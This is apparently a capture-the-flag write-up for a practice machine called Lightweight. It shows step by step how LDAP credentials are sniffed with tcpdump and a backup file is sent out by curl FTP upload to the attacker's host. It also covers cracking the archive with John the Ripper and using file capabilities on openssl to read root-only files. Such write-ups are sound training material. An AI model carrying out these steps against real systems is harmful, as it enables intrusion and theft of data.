We begin with a standard nmap scan:
root@orbital:~# nmap -A -T4 -oN lightweight_scan 10.10.10.119
And we can see it is running a few services:
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) 80/tcp open http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16) 389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
The LDAP (Lightweight Directory Access Protocol) service will surely be useful at some point, but for now, if we have a look at the HTTP server, we’ll find the following in the user page:
This server lets you get in with ssh. Your IP is automatically added as userid and password within a minute of your first http page request. We strongly suggest you to change your password as soon as you get in the box.
For the initial probe I’ve used the Linux Smart Enumeration script, which I prefer to other enumeration scripts. The ability to generate logs at different levels of detail is a great way to methodically dig into the machine. Since we do have an account and SSH access from the very start, we just copy files around with
LSE identified two other users, which given the names will interact with the LDAP service:
More interestingly, however, it highlights that we can sniff traffic with tcpdump. So let us listen:
ip@lightweight:~$ tcpdump -i 5 -vvv -XX
While listening to the TCP dump, if we navigate to the “banned users” page, we will get an interesting package:
lightweight.htb.56908 > lightweight.htb.ldap: Flags [P.], cksum 0x2983 (incorrect -> 0xd5e5), seq 1:92, ack 1, win 683, options [nop,nop,TS val 232812292 ecr 232812292], length 91 0x0000: 0000 0000 0000 0000 0000 0000 0800 4500 ..............E. 0x0010: 008f 51f8 4000 4006 bf6f 0a0a 0a77 0a0a ..Q.@.@..o...w.. 0x0020: 0a77 de4c 0185 a667 3ef3 08ce 5448 8018 .w.L...g>...TH.. 0x0030: 02ab 2983 0000 0101 080a 0de0 6f04 0de0 ..).........o... 0x0040: 6f04 3059 0201 0160 5402 0103 042d 7569 o.0Y...`T....-ui 0x0050: 643d 6c64 6170 7573 6572 322c 6f75 3d50 d=ldapuser2,ou=P 0x0060: 656f 706c 652c 6463 3d6c 6967 6874 7765 eople,dc=lightwe 0x0070: 6967 6874 2c64 633d 6874 6280 2038 6263 ight,dc=htb..8bc 0x0080: 3832 3531 3333 3261 6265 3164 3766 3130 8251332abe1d7f10 0x0090: 3564 3365 3533 6164 3339 6163 32 5d3e53ad39ac2
So we’re intercepting some LDAP traffic. LDAP supports different authentication methods, but since we can actually read this data, it looks like it is configured to use Simple Authentication. This type of authentication sends the DN and the password in plain text across the network.
DN: uid=ldapuser2,ou=People,dc=lightweight,dc=htb Password: 8bc8251332abe1d7f105d3e53ad39ac2
We can’t SSH into
ldapuser2, but if we connect with our initial user, we can then
su - ldap2user and use the password we have just recovered.
The user flag is present in this user’s home folder, as well as the following files:
netcat isn’t present on our target, but we have
curl so we can do a FTP upload. On my host I installed
pyftpdlib, which allows spooling up a minimal FTP server at a particular folder with no additional setup:
root@orbital:~# pip install --user pyftpdlib
root@orbital:~# python -m pyftpdlib --directory=. --port=2121 --write
And on lightweight:
ldapuser2@lightweight:~$ curl -k -T backup.7z ftp://10.10.14.13:2121
The backup file is password protected and contains the PHP source for the website. Might contain additional credentials?
JohnTheRipper should be able to do this.
I had to install the jumbo-bleeding version of JTR, as the pre-installed JTR can’t deal with the 7z file. With it installed, however, we can extract the hash with
root@orbital:~# ./7z2john.pl backup.7z > backup.7z.hash
And then ran John against the hash, using the default password list:
root@orbital:~# john --wordlist=password.lst backup.7z.hash
John will quickly show us that the password for the file is
delete. We can then extract the files and we quickly find credentials for
$username = 'ldapuser1'; $password = 'f3ca9d298a553da117442deeb6fa932d';
We then switch to this user with
su - ldapuser1.
Although none of the files have any interesting permissions set, they have something else of interest: capabilities. We can get the capabilities of all files in the machine by doing:
ldapuser1@lightweight:~$ getcap -r / 2>/dev/null
From this we find that the copy of
/home/ldapuser1 appears to have all the capabilities enabled. This would include reading files from
openssl of all things isn’t exactly
cat, but it can encode files in various formats and print them out. So, we ask it to encode
/root/root.txt in base64 and immediately decode the output afterwards!
ldapuser1@lightweight:~$ ./openssl base64 -in /root/root.txt | base64 -d
And the root flag is ours.